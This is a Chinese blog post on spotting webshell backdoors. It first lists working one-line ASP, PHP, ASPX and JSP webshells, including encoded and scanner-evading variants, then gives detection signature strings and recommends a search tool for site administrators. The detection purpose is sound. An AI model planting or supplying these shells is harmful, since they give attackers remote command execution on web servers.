收集一些常见的webshell后门的特征码

最新推荐文章于 2024-06-09 21:02:43 发布
最新推荐文章于 2024-06-09 21:02:43 发布
阅读量782 收藏 6
点赞数 2
文章标签: shell php java

一些常见的webshell(asp,aspx,php,jsp等)后门木马。

什么是一句话木马?不了解的朋友百度一下。

一句话木马具体有以下这些,这些都是自己平时收集的。(当然收集不齐全,希望大家帮忙完善~)

============================

asp一句话木马:
<%%25Execute(request("a"))%%25>
<%Execute(request("a"))%>
%><%execute request("a")%><%
<script language=VBScript runat=server>execute request("a")</script>
<%25Execute(request("a"))%25>
%><%execute request("yy")%>
<%execute request(char(97))%>
<%eval request(char(97))%>
":execute request("value"):a="

<script language=VBScript runat=server>if request(chr(35))<>"""" then
ExecuteGlobal request(chr(35))
</script>

在数据库里插入的一句话木马
┼攠數畣整爠煥敵瑳∨∣┩愾
┼癥污爠煥敵瑳∨≡┩> 密码为: a

utf-7的马
<%@ codepage=65000%>
<% response.Charset="936"%>
<%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>

Script Encoder 加密
<%@ LANGUAGE = VBScript.Encode %>
<%#@~^PgAAAA==r6P. ;!+/D`14Dv&X#*@!@*ErPPD4+ P2Xn^ED+VVG4Cs,Dn;!n/D`^4M`&Xb*oBMAAA==^#~@%>

可以躲过雷客图的一句话。
<%
set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.ExecuteStatement("ev"&"al(request(""1""))")
%>

php一句话
<? php eval($_POST[cmd]);?>
<?php eval($_POST[cmd]);?>
<?php system($_REQUEST['cmd']);?>
<?php eval($_POST[1]);?>

aspx一句话
<script language="C#" runat="server">
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10");
</script>

JSP一句话后门
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>

================================我是邪恶的分界线==============================

为什么收集这些东东?

有些站长说,webshell找到了,服务器打了补丁,网站漏洞也给补上了。甚至把整个web目录所有的文件都检查了多次,都没找到可疑的文件。为什么黑客还是让网站挂上木马了?

猜也猜得到拉,被放后门呗!那后门在哪?比较简单而且有效的方法当然是在正常文件里写入一句话木马了,以后连接上去就是了。况且杀毒软件对某些一句话木马不敏感,这个,玩黑的朋友都知道了~

也许你会问,能不能彻底把后门挖出来?这个难说~我就不敢保证了,哈哈。。。

不过下面这些或许对你有帮助。

下面整理了一些webshell后门的特征码(搜索的时候不要区分大小写):

asp木马特征:
aspshell
Execute(request
execute request(
eval request(
"ev"&"al(request(

ExecuteGlobal request
┼癥污爠煥敵瑳∨≡┩>

┼攠數畣整爠煥敵瑳∨∣┩愾
SqlRootkit
专用小马

小马

整站文件打包
确认解包吗
dama
不要干坏事
hack
fuck
郁闷,权限不够估计不能执行命令!

php木马特征:
base64
base64_decode
angle
<? php eval($_POST[cmd]);?>
<?php eval($_POST[
<?php system($_REQUEST['cmd']);?>
<?php system($_REQUEST[
phpspy
Scanners
打包下载
打包程序扩展名

asp.net木马特征:

ASPXSpy
专用小马

rootkit

jsp木马特征:

JFolder (我就只有这个。。。)

以上面这些作为特征码,用这个工具advanced find and replace 搜索可疑的文件,或许会找出点邪恶的东西,还工具还可以批量清马,并支持正则表达式,站长必备工具,呵呵!

当然还可以按文件修改时间进行搜索可疑文件,不过有些webshell支持文件属性修改。

AFR下载地址:

afr (advanced find and replace) 中文绿色版.rar

之前转了个文章,这里有介绍

iteye_11341
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
冰蝎加密 WebShell 过杀软
悦分享
08-03 2377
演练中,第一代webshell管理工具“菜刀”的攻击流量特征明显,容易被安全设备检测到,攻击方越来越少使用,加密webshell 正变得越来越流行,由于流量加密,传统的WAF、WebIDS设备难以检测,给威胁监控带来较大挑战。这其中最出名就是“冰蝎”,“冰蝎”是一款动态二进制加密网站管理客户端,演练中给防守方造成很大困扰,本文将对“冰蝎”的加密原理、流量特征、检测方案进行探讨。"冰蝎"客户端基于JAVA,所以可以跨平台使用,最新版本为v3.0 bate,兼容性较之前的版本有较大提升。...
PHP WebShell 免杀
悦分享
08-01 5866
一般的,利用能够执行系统命令、加载代码的函数,或者组合一些普通函数,完成一些高级间谍功能的网站后门的脚本,叫做Webshell。而php做为一门动态语言,其灵活性很高,因此一直以来Webshell的绕过与检测之间不断的产生着化学反应。Webshell绕过的本质其实是针对不同的检测给予不同的绕过方式,因此首先要了解Webshell是如何检测的。...
webshell特征定位器
02-22
强大的webshell特征定位器工具 很好用的哦 嘿嘿
unicode转ansi
05-26
当看到“┼攠數畣整爠煥敵瑳∨灯捸≤┩>”这样的内容时,可以用该软件转换为“”,比csdn之前上传的更好用。
webshell特征与分析
最新发布
qq_59357741的博客
06-09 456
webshell特征和分析
CTF-安全杂项-BAT公司信息查询系统
mynd天堂
03-06 1935
题目来源-http://www.shiyanbar.com/ctf/1820点击打开链接 打开题目链接,首先让我感到背景很奇怪,是一大堆同一张二维,点击源,查看里面的样式看到一张lala.jpg是一张二维扫描得到rootpadding.txt,进入得: 这就是我们第一次点击页面时对ID的判断,代码已经说明了跳向何处,直接进入得是一个404页面查看源有一句很 奇怪的
CTF-web 第十部分 webshell基础与免杀
热门推荐
iamsongyu的博客
11-15 1万+
一、什么是webshell (1)webshell简介         webshell,顾名思义:web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是就是web的一个管理工具,可以对web服务器进行操作的权限,也叫webadmin。webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于webshell的功能比较强大,可以上传下载...
实验吧杂项记错本
Grey的博客
05-06 6014
1.小白鼠与蝙蝠的故事下载题目压缩包解出来是一个vbs文件,这题就是考验vbs能力了,如果是学c语言的人会感觉有点吃力。第一步千万!千万!千万!不要直接运行vbs(不管是不是这题还是其他vbs),这会有风险,先复制个副本在虚拟机(当然本题没那么危险啦)运行下,弹出框显示"this_is_key",(⊙0⊙)如果有那么简单就好了,这里要注意下,当运行后这个vbs,原文件会被改写(幸好运行的是副本)。...
发现隐藏的Webshell后门
MSB_WLAQ的博客
10-06 528
前言: 如何在百万行代码里发现隐藏的后门? 试想一下,如果你的网站被入侵,攻击者留下隐藏的后门,你真的都可以找出来吗?面对一个大中型的应用系统,数以百万级的代码行,是不可能做到每个文件每段代码进行手工检查的。 即使是一款拥有 99.9% 的 Webshell 检出率的检测引擎,依然可能存在 Webshell 绕过的情况。另外,像暗链、网页劫持、页面跳转等常见的黑帽 SEO 手法,也很难通过手动检测或工具检测全部识别出来。 最好的方式就是做文件完整性验证。通过与原始代码对比,可以快速发现文件是否被篡改
php后门绕过eval关键字,一些变态的PHP一句话后门收集
weixin_42181929的博客
03-18 1779
这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。利用404页面隐藏PHP小马404 Not FoundNot FoundThe requested URL was not found on this server.@preg_replace("/[pageerror]/e",$_...
Webshell安全分析实践谈
01-28
Webshell安全是网络安全领域中的一个重要议题,通常指的是攻击者通过网站后门控制服务器的权限。这篇文档提供了Webshell安全分析的实践方法,包括安全处理的线索挖掘、处置和溯源过程。以下是根据给定文件内容提炼出...
UNICODE2ANSI
03-24
UNICODE2ANSI.exe是UNICODE和ANSI两种编转换工具。说编转化可能很多朋友还不是很明白,但是如果说起插入数据库的一句话“<% ex ecut e requ est("n")%>”的加密代码“┼攠數畣整爠煥敵瑳∨≮┩>”,相信很多朋友都有所耳闻。它就是一个转换这2种编的一个小工具。
UNICODE和ANSI两种编转换工具
05-26
UNICODE2ANSI.exe是UNICODE和ANSI两种编转换工具。说编转化可能很多朋友还不是很明白,但是如果说起插入数据库的一句话“”的加密代码“┼攠數畣整爠煥敵瑳∨≮┩>”,相信很多朋友都有所耳闻。它就是一个转换这2种编的一个小工具。
webshell的视角谈攻防对抗
si1ence的博客
12-05 807
0x0 背景 由于参加最近特殊多人活动的原因,很多渗透攻击武器也进行了对应的更新。冰蝎出了3.0版本、甚至还有好几个beta版本;还朋友圈还出了一个据说比冰蝎3.0还厉害的神器”哥斯拉”全部类型的shell均过市面所有静态查杀、流量加密过市面全部流量waf、自带的插件是冰蝎、蚁剑不能比拟的;看名字就很厉害的样子,看描述更是功能强大 不禁内心一阵酸爽。 丰富了自己部分武器库之后很多白帽子喜悦之情溢于言表,身边很多小伙伴甚至都开始在本地开始测试了;几家欢喜几家愁,总一些人的快乐终究是建立在一些人的痛苦之上
实验吧 杂项
weixin_34087307的博客
12-08 1403
1. xor解密: lovelovelovelovelovelovelovelove ���V��� �� �0� �0� �0�� ������ # -*- coding:utf-8 -*- a =open('1.txt','rb').read() b =open('2.txt','rb').read...
墨者学院-CMS系统漏洞分析溯源(第3题)
JimWu的博客
09-04 531
CMS系统漏洞分析溯源(第3题) 难易程度:★★★ 题目类型:CMS漏洞 使用工具:FireFox浏览器、菜刀 1.打开靶场,跟住题目的解题思路提示在用户注册的密问题能将一句话木马插入到数据库当中。 然后把前面的信息填好。 在密问题中填入:┼攠數畣整爠煥敵瑳∨≡┩愾 这是由<% execute request(“a”)%>经过Unicode加密的,加密方式是: ANSI→Unico...
access筛选末位数字为1或5_SQL注入第二章——access,mssql,oracle
weixin_39957835的博客
11-29 389
一、Access注入Access是轻量级数据库,特点是没有库,没有用户,单文件即可存储数据,在SQL注入时必须猜测表名和列名。Access只有联合注入和布尔盲注。1,联合注入http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=151 order by 1 http://127.0.0.1/Production/PRODUCT_DETAIL.asp?i...
那些强悍的PHP一句话后门
zhangge3663的博客
03-14 650
强悍的PHP一句话后门 这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。 利用404页面隐藏PHP小马: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><hea...
SQL通用防注入系统asp版 插一句话漏洞利用
weixin_30314813的博客
08-06 243
今晚群里朋友叫看个站,有sql防注入,绕不过,但是有发现记录wrong的文件sqlin.asp 既然做了记录,再查看了下它的记录文件 于是想着构造个asp一句话写进去,前面几种没加密的都失败了,于是写了个加密的. ┼攠數畣整爠煥敵瑳∨≡┩愾 密 a (加密方式是: ANSI->Unicode) 提交 and 1= ┼攠數畣整爠煥敵瑳∨≡┩愾 ht...
webshell后门
07-27
Webshell后门是指一段网页代码,通常是ASPASP.NET、PHP、JSP等语言编写的,用于在服务器端进行一些危险操作,获取敏感信息或控制服务器的控制权。攻击者通过Webshell后门可以执行各种操作,比如上传、下载、删除...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值